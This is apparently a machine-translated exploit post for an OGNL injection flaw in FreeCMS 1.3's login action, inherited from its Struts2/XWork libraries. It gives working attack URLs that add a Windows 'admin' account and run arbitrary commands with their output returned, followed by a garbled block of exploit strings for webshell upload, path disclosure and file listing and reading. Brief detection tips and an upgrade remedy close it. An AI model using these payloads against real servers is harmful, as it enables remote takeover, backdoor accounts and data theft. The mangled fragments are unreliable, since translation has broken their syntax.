Open-source free java CMS-FreeCMS1.3-Data Object-mail
Project address: https://code.google.com/p/freecms/
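Vulnerable action (the value of the `user.loginname` request parameter ends up evaluated as an OGNL expression; EXP stands for the injected expression):
http://localhost:8080/ff/login_login.do?user.loginname=EXP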
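Add an account. The expression sets `xwork.MethodAccessor.denyMethodExecution` to false and `allowStaticMethodAccess` to true, then calls `Runtime.exec` to run `net user admin admin /add` on the Windows host, with the privileges of the servlet container process: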
http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec('net%20user%20admin%20admin%20/add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true
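Run a command taken from the `cmd` request parameter. The expression reads the command's output into a 1000-byte buffer and prints it in the HTTP response: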
http://localhost:8080/ff/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set
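Other EXP (exploit) fragments. The strings below were mangled by machine translation (spaces inserted, identifiers lower-cased), so they are not valid as printed. They cover a time-delay check via `Thread.sleep`, writing a file under the web root, command execution, web-path disclosure, and listing and reading files. For detection, look for request parameter names or values containing `_memberAccess`, `allowStaticMethodAccess` or `xwork.MethodAccessor.denyMethodExecution`, where `#` may appear encoded as `%23`, `\43` or `\u0023`. The remedy is to upgrade the Struts2/XWork libraries bundled with the CMS to a patched release.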
Var TEST_SLEEP_EXP = "('\ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) (' \ 43 context [\ 'xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (d) ('@ java. lang. thread @ sleep ([5000]) ') (d ))"; // Exp1 detects the vulnerability var TEST_SLEEP_EXP_2 = "'% 2b (% 23_memberAccess [\" allowStaticMethodAccess \ "] = true, @ java. lang. thread @ sleep ([5000]) % 2b '"; // Exp2 detects the vulnerability var TEST_SLEEP_EXP_3 =" % 28% 23 context [% 22xwork. methodAccessor. denyMethodExecution % 22] % 3D + new + java. lang. boolean % 28 false % 29, % 20% 23_memberAccess [% 22 allowStaticMethodAccess % 22] % 3d + new + java. lang. boolean % 28 true % 29, @ java. lang. thread @ sleep ([1, 5000]) (meh % 29 & z [% 28foo % 29% 28% 27meh % 27% 29] = true "// Exp3 detects the vulnerability var TEST_UPLOAD_SHELL =" ('\ u0023_memberAccess [\\' allowStaticMethodAccess \ ']') (meh) = true & (aaa) ('\ u0023context [\' xwork. methodAccessor. denyMethodExecution \ '] \ u003d \ u0023foo') (\ u0023foo \ u003dnew % 20java. lang. boolean (% 22 false % 22) & (i1) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i12) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse ()') (d) & (i13) ('\ 43xman. getWriter (). println (\ 43req. getServletContext (). getRealPath (% 22 \ u005c % 22) ') (d) & (i2) (' \ 43fos \ 75new \ 40java. io. fileOutputStream (new \ 40java. lang. stringBuilder (\ 43req. getRealPath (% 22 \ u005c % 22 )). append (@ java. io. file @ separator ). append (% 22system. jsp % 22 ). toString () ') (d) & (i3) (' \ 43fos. write (\ 43req. getParameter (% 22 t % 22 ). getBytes () ') (d) & (i4) (' \ 43fos. close () ') (d) & t = "; var test_execute_assist_exp =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. 
denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (h) ('\ 43webRootzpro \ 75@java.lang.runtime@getruntime(cmd.exe c (\ 43req. getParameter (% 22cmd % 22) ') (d) & (I) (' \ 43webRootzproreader \ 75new \ 40java. io. dataInputStream (\ 43webRootzpro. getInputStream () ') (d) & (i01) (' \ 43webStr \ 75new \ 40 byte [[100] ') (d )) & (i1) ('\ 43webRootzproreader. readFully (\ 43 webStr) ') (d) & (i111) (' \ 43webStr12 \ 75new \ 40java. lang. string (\ 43 webStr) ') (d) & (i2) (' \ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse ()') (d) & (i95) ('\ 43xman. getWriter (). println (\ 43webStr12) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) & cmd = cmd % 20/c % 20 "; var test_execute_1__exp2 =" 1_c (% 23req. getParameter (% 22cmd % 22), % 23 iswinreader = new % 20java. io. dataInputStream (% 23exec. getInputStream (), % 23 buffer = new % 20 byte [[100], % 23iswinreader. readFully (% 23 buffer), % 23 result = new % 20java. lang. string (% 23 buffer), % 23 response = @ org. apache. struts2.ServletActionContext @ getResponse (), % 23response. getWriter (). println (% 23 result) % 2b '& cmd = cmd % 20/c % 20 "var TEST_GET_WEB_PATH =" (' \ 43_memberaccess.allowstaticmethodaccess') () = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i2) (' \ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i95) (' \ 43xman. getWriter (). println (\ 43req. 
getRealPath (% 22 \ u005c % 22) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) "; var TEST_GET_WEB_PATH2 ="' % 2b (% 23_memberAccess [% 22 allowStaticMethodAccess % 22] = true, @ org. apache. struts2.ServletActionContext @ getResponse (). getWriter (). println (@ org. apache. struts2.ServletActionContext @ getRequest (). getRealPath (% 22/% 22) % 2b '"; var TEST_FILES_LIST =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i95) (' \ 43xman. getWriter (). println (@ java. io. file @ listRoots () [fd_list]) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) "; // file traversal // var TEST_FILES_LIST =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i2) ('\ 43xman \ 75@org.apache.struts2.ServletActionContext @ getResponse () ') (d) & (i3) (' \ 43files \ 75new \ 40java. lang. stringBuilder (@ java. io. file @ listRoots () [4]. listFiles () [0]). append (% 22 [isDirectory] % 22 ). append (@ java. io. file @ listRoots () [4]. listFiles () [0]. isDirectory () ') (d) & (i95) (' \ 43xman. getWriter (). println (\ 43 files) ') (d) & (i99) (' \ 43xman. getWriter (). close () ') (d) "; // file traversal var TEST_GET_FILE_CONTENT =" (' \ 43_memberaccess.allowstaticmethodaccess') (a) = true & (B) ('\ 43 context [\' xwork. methodAccessor. 
denyMethodExecution \ '] \ 75false') (B) & (' \ 43c ') (' \ 43_memberAccess.excludeProperties \ 75@java.util.Collections @ EMPTY_SET ') (c )) & (g) ('\ 43req \ 75@org.apache.struts2.ServletActionContext @ getRequest ()') (d) & (i1) ('\ 43dis \ 75new \ 40java. io. dataInputStream (new \ 40java. io. fileInputStream (@ java. io. file @ listRoots () [[dname]. listFiles () [fname]) ') (d) & (i2) (' \ 43dos \ 75new \ 40java. io. dataOutputStream (@ org. apache. struts2.ServletActionContext @ getResponse (). getOutputStream () ') (d) & (i3) (' \ 43buff \ 75new \ 40 byte [[bsize] ') (d )) & (i4) ('\ 43dis. skipBytes (0) ') (d) & (i5) (' \ 43size \ 75 \ 43dis. read (\ 43 buff) ') (d) & (i6) (' \ 43dis. close () ') (d) & (i7) (' \ 43dos. writeInt (\ 43 size) ') (d) & (i95) (' \ 43dos. write (\ 43buff \ u002c0 \ u002c \ 43 size) ') (d) & (i99) (' \ 43dos. close () ') (d ))";